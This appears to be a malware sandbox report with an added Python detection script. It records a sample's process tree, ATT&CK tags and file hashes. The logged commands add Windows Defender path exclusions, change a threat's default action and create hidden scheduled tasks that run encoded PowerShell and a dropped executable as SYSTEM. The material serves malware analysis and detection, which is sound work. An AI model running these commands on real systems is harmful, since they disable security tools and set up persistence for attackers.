C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2028
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QwrkXrSOGBVCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QwrkXrSOGBVCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qtzXYlPxPmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qtzXYlPxPmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uyPuAlXAcIBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uyPuAlXAcIBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wKAtYsCOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wKAtYsCOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OsVMcSWGRXGXAxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OsVMcSWGRXGXAxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 
\"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IIxDORIMmvvtwMVt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IIxDORIMmvvtwMVt\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4672 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:323⤵PID:6068
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:324⤵PID:1292
-
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:64
    (depth 3) PID:5804
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR" /t REG_DWORD /d 0 /reg:32
    (depth 3) PID:5820
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR" /t REG_DWORD /d 0 /reg:64
    (depth 3) PID:2480
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qtzXYlPxPmUn" /t REG_DWORD /d 0 /reg:32
    (depth 3) PID:1648
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qtzXYlPxPmUn" /t REG_DWORD /d 0 /reg:64
    (depth 3) PID:6100
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uyPuAlXAcIBU2" /t REG_DWORD /d 0 /reg:32
    (depth 3) PID:4200
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uyPuAlXAcIBU2" /t REG_DWORD /d 0 /reg:64
    (depth 3) PID:668
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wKAtYsCOU" /t REG_DWORD /d 0 /reg:32
    (depth 3) PID:3368
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wKAtYsCOU" /t REG_DWORD /d 0 /reg:64
    (depth 3) PID:5848
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OsVMcSWGRXGXAxVB /t REG_DWORD /d 0 /reg:32
    (depth 3) PID:3856
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OsVMcSWGRXGXAxVB /t REG_DWORD /d 0 /reg:64
    (depth 3) PID:5956
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW /t REG_DWORD /d 0 /reg:32
    (depth 3) PID:5220
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW /t REG_DWORD /d 0 /reg:64
    (depth 3) PID:4128
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IIxDORIMmvvtwMVt /t REG_DWORD /d 0 /reg:32
    (depth 3) PID:3508
C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IIxDORIMmvvtwMVt /t REG_DWORD /d 0 /reg:64
    (depth 3) PID:5036
C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gnPdzlYCb" /SC once /ST 08:48:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Creates scheduled task(s)
    (depth 2) PID:5580
C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gnPdzlYCb"
    (depth 2) PID:3444
C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gnPdzlYCb"
    (depth 2) PID:6636
C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "raBkRkUFhLhqVOsAt" /SC once /ST 05:47:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IIxDORIMmvvtwMVt\hnASLnknHwflCYp\YHiRqDo.exe\" Jd /site_id 525403 /S" /V1 /F
    - Drops file in Windows directory
    - Creates scheduled task(s)
    (depth 2) PID:6712
C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "raBkRkUFhLhqVOsAt"
    (depth 2) PID:6752
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -windowstyle hidden
    (depth 1) PID:4232
C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe
    "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe" Name host ValueOnly True
    (depth 2) PID:7176
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    (depth 1) PID:6180
C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    (depth 2) PID:7112
C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 804 -ip 804
    (depth 1) PID:6196
C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1164 -ip 1164
    (depth 1) PID:6292
C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
    (depth 1) PID:7044
C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
    (depth 1) PID:7028
C:\Windows\system32\gpscript.exe
    gpscript.exe /RefreshSystemParam
    (depth 1) PID:7224
C:\Windows\system32\gpscript.exe
    gpscript.exe /RefreshSystemParam
    (depth 1) PID:7232
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
    C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
    (depth 1) PID:7472
C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 484
    - Program crash
    (depth 2) PID:7512
C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 7472 -ip 7472
    (depth 1) PID:7488
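Two things in the process tree above are worth pulling out of endpoint telemetry. First, reg.exe writes value names under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths, the key that Group Policy populates, with REG_DWORD data 0 (the value name is the excluded path), and it does so once with /reg:32 and once with /reg:64 so the entry lands in both registry views. Second, a scheduled task runs PowerShell with an -EncodedCommand whose base64 decodes (UTF-16LE) to `start-process -WindowStyle Hidden gpupdate.exe /force`, which matches the gpupdate.exe child seen under powershell.EXE and is what makes the policy-based exclusions take effect. The Python below is an added example and not part of the sandbox report: it tokenizes command lines copied from the tree above, extracts the exclusion targets and registry views, and decodes the PowerShell payload. The HKCU reg.exe line is a constructed benign control, not from the report.

```python
"""Triage helpers for reg.exe / schtasks / powershell command lines.
Added example; the command lines below are copied from the process tree in the
report, except the HKCU line, which is a constructed benign control."""
import base64
import re

SAMPLE_CMDLINES = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OsVMcSWGRXGXAxVB /t REG_DWORD /d 0 /reg:32',
    r'schtasks /CREATE /TN "gnPdzlYCb" /SC once /ST 08:48:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==',
    # constructed benign control: a reg.exe ADD that is not a Defender exclusion
    r'"C:\Windows\system32\reg.exe" ADD "HKCU\Software\ExampleVendor\ExampleApp" /v Installed /t REG_DWORD /d 1 /f',
]

# Defender exclusion subkeys (policy or non-policy hive; Paths/Extensions/Processes).
EXCLUSION_KEY = re.compile(r"\\Windows Defender\\Exclusions\\(Paths|Extensions|Processes)\b", re.I)
# -EncodedCommand plus the common abbreviations PowerShell accepts, followed by base64.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/]+=*)", re.I)


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted arguments whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_defender_exclusion(cmdline):
    """If cmdline is `reg.exe ADD` against a Windows Defender Exclusions key, describe it; else None."""
    toks = tokenize(cmdline)
    if len(toks) < 3 or not toks[0].lower().endswith("reg.exe") or toks[1].upper() != "ADD":
        return None
    m = EXCLUSION_KEY.search(toks[2])
    if not m:
        return None
    info = {
        "kind": m.group(1).lower(),      # paths / extensions / processes
        "key": toks[2],
        "value": None,                   # for Paths the value *name* is the excluded path
        "view": "default",               # /reg:32 or /reg:64 selects the registry view written
        "via_policy": "\\policies\\" in toks[2].lower(),  # HKLM\SOFTWARE\Policies is the GPO-managed hive
    }
    for i, tok in enumerate(toks):
        low = tok.lower()
        if low == "/v" and i + 1 < len(toks):
            info["value"] = toks[i + 1]
        elif low.startswith("/reg:"):
            info["view"] = low.split(":", 1)[1]
    return info


def summarize(cmdlines):
    """Aggregate findings over a batch of process command lines (e.g. Sysmon EID 1 or Security 4688)."""
    out = {"excluded_paths": set(), "views": set(), "policy_backed": False, "decoded_commands": []}
    for line in cmdlines:
        excl = parse_defender_exclusion(line)
        if excl:
            if excl["kind"] == "paths" and excl["value"]:
                out["excluded_paths"].add(excl["value"])
            out["views"].add(excl["view"])
            out["policy_backed"] = out["policy_backed"] or excl["via_policy"]
        decoded = decode_encoded_command(line)
        if decoded and decoded not in out["decoded_commands"]:
            out["decoded_commands"].append(decoded)
    return out


if __name__ == "__main__":
    for key, val in summarize(SAMPLE_CMDLINES).items():
        print(f"{key}: {val}")
```

Run against the report's lines, the summary lists the two excluded directories, both registry views, a policy-backed exclusion, and the decoded `gpupdate.exe /force` launcher. The abbreviation list in ENCODED_ARG is not exhaustive (PowerShell accepts any unambiguous prefix of -EncodedCommand), so a production rule should also key on the parent being schtasks.exe or on the task's /RU principal as seen here.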
Network
MITRE ATT&CK Enterprise v6
Persistence
- Hidden Files and Directories (3)
- Modify Existing Service (2)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- Disabling Security Tools (1)
- File and Directory Permissions Modification (1)
- Hidden Files and Directories (3)
- Install Root Certificate (1)
- Modify Registry (6)
- Scripting (1)
- Web Service (1)
Downloads
-
Filesize: 19.1MB
MD5: d2b25b010a85daabcdf9ff1c7477c6f8
SHA1: e60422531cf07210847eed3fce47e9886ab7b1eb
SHA256: 5f5a2b2ed94137cd5de44d1e509a250fe8217f295a891aed8ed2e5df54abd132
SHA512: 68fde9e862b90669110498d0d74682ae849c9c0c8d3d9c52ec19b9c7e464d559797f4b0ca54b395971dcef329d318eb191eba76eeaab1ba377fe8a747f4a8404
-
Filesize: 81KB
MD5: 2ebf45da71bd8ef910a7ece7e4647173
SHA1: 4ecc9c2d4abe2180d345f72c65758ef4791d6f06
SHA256: cf39e1e81f57f42f4d60abc1d30ecf7d773e576157aa88bbc1d672bf5ad9bb8b
SHA512: a5d3626553731f7dc70f63d086bd9367ea2c06ad8671e2578e1340af4c44189ecb46a51c88d64a4b082ce68160390c3f8d580dde3984cd254a408f1ef5b28457
-
Filesize: 55KB
MD5: a2fff5c11f404d795e7d2b4907ed4485
SHA1: 3bf8de6c4870b234bfcaea00098894d85c8545de
SHA256: ed7830d504d726ce42b3b7a1321f39c8e29d1ebad7b64632e45b712f0c47e189
SHA512: 0cd1329989946cfbcad2fd28b355f3bf3a731f5f8da39e3a0ddf160a7aac1bd23046fb902a6b27499026641929ddcef58f80ea3c0bfc58cb25ee10a0b39bdf02
-
Filesize: 76KB
MD5: 2002b2cc8f20ac05de6de7772e18f6a7
SHA1: b24339e18e8fa41f9f33005a328711f0a1f0f42d
SHA256: 645665cf3338e7665e314f53fbbcb3c5d9174e90f3bf65ddbdc9c0cb24a5d40d
SHA512: 253d0c005758fcb9e0980a01016a34073e7cdffb6253a2ba3d65a2bb82764638f4bd63d3f91a24effd5db60db59a8d28155e7d6892d5cc77c686f74bf0b05d0a
-
Filesize: 113KB
MD5: c827a20fc5f1f4e0ef9431f29ebf03b4
SHA1: ee36cb853d79b0ba6b4e99b1ef2fbae840c5489d
SHA256: d500cff28678eced1fc4b3aeabecc0f3b30de735fdefe90855536bc29fc2cb4d
SHA512: d40b816cde6bdf6e46c379674c76f0991268bd1617b96a4e4f944b80e12692ce410e67e006b50b6a8cfaef96aacc6cb806280bac3aa18ee8690669702d01065c
-
Filesize: 37KB
MD5: f9799b167c3e4ffee4629b4a4e2606f2
SHA1: 37619858375b684e63bffb1b82cd8218a7b8d93d
SHA256: 02dd924d4ebfbb8b5b0b66b6e6bb2388fccdad64d0493854a5443018ad5d1543
SHA512: 1f273bb5d5d61970143b94696b14887faa5ed1d50742eccec32dbd87446d696ff683053542c3be13d6c00597e3631eb1366abb6f145d8cc14d653d542893001b
-
Filesize: 154KB
MD5: 38c434afb2a885a95999903977dc3624
SHA1: 57557e7d8de16d5a83598b00a854c1dde952ca19
SHA256: bfe6e288b2d93905f5cbb6d74e9c0fc37145b9225db6d1f00c0f69eb45afd051
SHA512: 3e59b79c47cb022d7acec0af164c0225cd83588d5e7f8ca3e8a5dfae27510646391a1b08d86d5ee0b39d1b6bf08409d3758488df3c8cc4d458bed9faab7686e8
-
Filesize: 67KB
MD5: 6b59705d8ac80437dd81260443912532
SHA1: d206d9974167eb60fb201f2b5bf9534167f9fb08
SHA256: 62ed631a6ad09e96b4b6f4566c2afc710b3493795edee4cc14a9c9de88230648
SHA512: fa44386b9a305a1221ed79e1ca6d7edf7a8e288836b77cdca8793c82ebf74a0f28a3fc7ae49e14e87029642d81773d960c160c8b3bcb73e8a4ec9a2fd1cdc7fd
-
Filesize: 139KB
MD5: e28ee2be9b3a27371685fbe8998e78f1
SHA1: fa01c1c07a206082ef7bf637be4ce163ff99e4ac
SHA256: 80041ce67e372f1b44b501334590c659154870286d423c19f005382039b79476
SHA512: 708e4069bafa9c5fb0d324e60cc81b1a3a442113f84a4e832a97b4196bee0a4a91f2e13239c91757512e1b42bb23166360ad44a5dce68316799aafc91e5bba04
-
Filesize: 762KB
MD5: bf37929f73fd68293b527c81e9c07783
SHA1: 7a9e3d00d6b8df4ba32da034775fcfdf744f0bd7
SHA256: 6634df5aa852c0edf0722176c6d0d8b5d589c737189ab50b8f8c3dcfcc4c29a6
SHA512: fc38d7e3f1fbe0208a275d7168c4ba3c468945d775169d753e05995e13d7f2b7cd66a5a413fb96c61889ad1e796f3b5b45080396a742ed440ef54303917d22a3
-
Filesize: 2.1MB
MD5: aad424a6a0ae6d6e7d4c50a1d96a17fc
SHA1: 4336017ae32a48315afe1b10ff14d6159c7923bc
SHA256: 3a2dba6098e77e36a9d20c647349a478cb0149020f909665d209f548dfa71377
SHA512: aa4b74b7971cb774e4ae847a226cae9d125fadc7cde4f997b7564dff4d71b590dcbc06a7103451b72b2afe3517ab46d3be099c3620c3d591ccbd1839f0e8f94a
-
Filesize: 28KB
MD5: bc20614744ebf4c2b8acd28d1fe54174
SHA1: 665c0acc404e13a69800fae94efd69a41bdda901
SHA256: 0c7ec6de19c246a23756b8550e6178ac2394b1093e96d0f43789124149486f57
SHA512: 0c473e7070c72d85ae098d208b8d128b50574abebba874dda2a7408aea2aabc6c4b9018801416670af91548c471b7dd5a709a7b17e3358b053c37433665d3f6b
-
Filesize: 525KB
MD5: 697766aba55f44bbd896cbd091a72b55
SHA1: d36492be46ea63ce784e4c1b0103ba21214a76fb
SHA256: 44a228b3646eb3575abd5cbcb079e018de11ca6b838a29e4391893de69e0cf4b
SHA512: 206957347540f1356d805bf4a2d062927e190481aadc105c3012e69623149850a846503fca30fc38298f74d7f8f69761fddd0aa7f5e31fedb1fa5e5c9de56e9d
-
Filesize: 350KB
MD5: 90df5360a7ccaefef170129c641f5351
SHA1: 389a239eb2f91161b2dc4d879ee834c12cc0054c
SHA256: 947ef90d8734177baf445eaff7da148b3726ab2e4156bf4a7ae19986e8f5596b
SHA512: c7caab04be88e17c20198f70de91e0781e41aed1f6fa2f4af4b74988c7ee9ce91a89cd72e40bda19ca99b15e28dcfdf4edc628e909c004e7e122044a450c3d33
-
Filesize: 3.9MB
MD5: c512c6ea9f12847d991ceed6d94bc871
SHA1: 52e1ef51674f382263b4d822b8ffa5737755f7e7
SHA256: 79545f4f3a658865f510ab7df96516f660e6e18fe12cadaaec3002b51fc29ef6
SHA512: e023a353d6f0267f367276344df5f2fdbc208f916ca87fa5b4310ea7edcac0a24837c23ab671fb4b15b109915dfd0e57fbe07593a764b3219312ed5737052822
-
Filesize: 23KB
MD5: 441299529d0542d828bafe9ac69c4197
SHA1: da31b9afb68ba6e2d40bbc8e1e25980c2afeb1b3
SHA256: 973f851dfaf98617b3eb6fa38befeb7ede49bd993408917e207dc7ea399de326
SHA512: 9f0fb359a4291d47b8dc0ec789c319637dde0f09e59408c4d7fd9265e51c978aa3ba7ea51ca9524833814bca9e7978d9817658655ee339191634d4ae5f426ddc
-
Filesize: 385KB
MD5: 45abb1bedf83daf1f2ebbac86e2fa151
SHA1: 7d9ccba675478ab65707a28fd277a189450fc477
SHA256: 611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f
SHA512: 6bf1f7e0800a90666206206c026eadfc7f3d71764d088e2da9ca60bf5a63de92bd90515342e936d02060e1d5f7c92ddec8b0bcc85adfd8a8f4df29bd6f12c25c
-
Filesize: 390KB
MD5: b22cf896430a7bae5e38c51a7e0ac494
SHA1: 86e6208697a0a52686a6227ccd15eeadad850e6a
SHA256: 22bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275
SHA512: a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854
-
Filesize: 974KB
MD5: 15777ae423417df86584aac2148b5d44
SHA1: e5d89fc00ee12af8168b5ff7a947f2718f95ea6c
SHA256: 3873e8543793c56c72c643a82c64a9c9163ce2e931dc57c14392868bff4fe7f5
SHA512: 9fedb0be63761c533d010656197c1778d496caadb4c83cb7a32841a11535ff5fd0de51a2c7b59e3c5663ab8367a4ff60f4aa45284421dd553c0efc25f3bb13a1
-
Filesize: 1.8MB
MD5: 8e6f9cd063f15c66246c1def889860fd
SHA1: 40d75fd878f3103a2949980f48525b8d221c0ed6
SHA256: 98f2f76e626b55fb471e5e9a830bc64ea4bbae565c3a554fea6970d8ffbede76
SHA512: c0f44c98480b0540f075b7de4025b1a14fa6020f95372767fa59217656ab64a1f14ecff628c6056434fa19ac39c55e6215b77d79d4d5e68a8a09fd63805e83df
-
Filesize: 147KB
MD5: 17e96c5b675aa027922e74cbde46b3aa
SHA1: b7280ba769deadfeab7437235ad132fb9d144416
SHA256: 11f8751109321019dafea27c69978ce5eb97aea15953c1af3059442c7ffcde64
SHA512: da2bcc6d10ac7deeadd3bc50e1e677a97d257559cb73a017a0c58cde0f8fde48103cb6cf4224d593f10a2c00e6760c5d07f6cf157cb745c470ce13a32bd4d932
-
Filesize: 394KB
MD5: 0b0a2a87f1c3baf76f3929078c0a1661
SHA1: c14e735c3441dc5a8a043987955708a1f9c6d9a2
SHA256: 89ead50cf272732c685b4cbe67cb56cf0af035004c3db39bad5f68158045a01a
SHA512: febf381f1eba30825c71a154c17f71370de2f9ef67e85f4ac1d4a84a36bef32183bd75a1333efdf57ca0bb2e73b784df098382f49e5c2e14e842ac6d2822e2f5
-
Filesize: 3.5MB
MD5: 022300f2f31eb6576f5d92cdc49d8206
SHA1: abd01d801f6463b421f038095d2f062806d509da
SHA256: 59fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15
SHA512: 5ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe
-
Filesize: 1.9MB
MD5: b57d28ba7854b185f098a538af3b8e36
SHA1: c36d58fcec162801c15768b78c36b1464e9cbb66
SHA256: e64be99aa47e8f713b6189431159963c8c383563f6f0831a36d56991eefcf8ec
SHA512: f74e9f42baed911d8a1f615f7ecddb63550519475e20c2f9b6b6cb76c6cf332bd89e3f3da731b529a29fb5c0111c7cfa48296e5daf9901585d98987c7e485a9d
-
Filesize: 365KB
MD5: 9b51aacc658896de78bbe14567334f2f
SHA1: 72edbe5ad26bac081baf9dba2a5c4ff23e7e254d
SHA256: f690c8889337ac8c3ebcbed491d3797cf1eee5e85493c985dee87778d1309281
SHA512: 82b47e8d278d8616414bb1d596be37120b8108283563e15a94ce4358c5a0066d47d4b4b7818be1e8f070949b82d4c645615947a2ab6a2c84d054042392f88429
-
Filesize: 279KB
MD5: 5163ae847dec4b423a4e9b1eb43d3864
SHA1: 15e41ab0f8b44ae83baf879f04e60ff68f5959d1
SHA256: 4ac6ba19c72728768d7d070d3a00fe605a2a8500f0301b8a42028b702dafd430
SHA512: 84f9a42bbe81e837836b3eec3440174cfae66087ca8c9339999a52c80f4fcf13d44bec35c60a9d286fa3dfa54d2b48a9e3285de4257a018220294b601f775e2b
-
Filesize: 2.2MB
MD5: 59bc91d7b08161cb0849afc21a442721
SHA1: 05c5aec0cefc71f3f1bfffb7b3de88d813c92335
SHA256: 358fc61235ec7b1c4eb2c26716ca7cbb19bca7de64f5044d485fdfa1cefa2356
SHA512: e5bfe6161b6f344cc7b9bd910d9002edadee613699185e9e591967bceca3b6d2f90cad37021f4a8e02e20bdd5670ed4314b019a70ee73c36d9c0d1b773ec42ee
-
Filesize: 10.2MB
MD5: 4aa2ed3cbbc9843b66715959adf53589
SHA1: f52474066e53f13ea9eff8144c2c9ed17318ba98
SHA256: 336c28695850bb8182b8a1baed4c64ca5aff7b35cb8fcbcdb954a9b9c709b640
SHA512: 98366485496f6f3ce81ada5578ddc7a580e902a75a728f4d14e7c79d15df6b4104f0eed3a09e06e48113666d918abdb1ad78ef5d9595c78ea19c495b9a66b744
-
Filesize: 732KB
MD5: a7f0db730ffc25346b807b44e22d76e2
SHA1: 2cd65e498430b3a083437bbb004c85194743fcba
SHA256: 2e7b5d0e19e55b6a2874d14c700d53949ffdbd02f51bf617d1a92dbaf8521f3d
SHA512: a101b64f8660c9d9392811c2ba7745863065b8c498955362e7df56de7d1b3ed5a488ec70941baf748095bba2ea85d6fb04ab3901c72ad5742d3d3791380cfb8b
-
Filesize: 401KB
MD5: 22922137714e5791617bc3c9710615b6
SHA1: 78cff80d5ab75b845272c728429446f0807b5ad4
SHA256: f49c22644ec5e45d9188a8727dc2f7750dd5e23bbcb0d24e2455aa7a2ecc1952
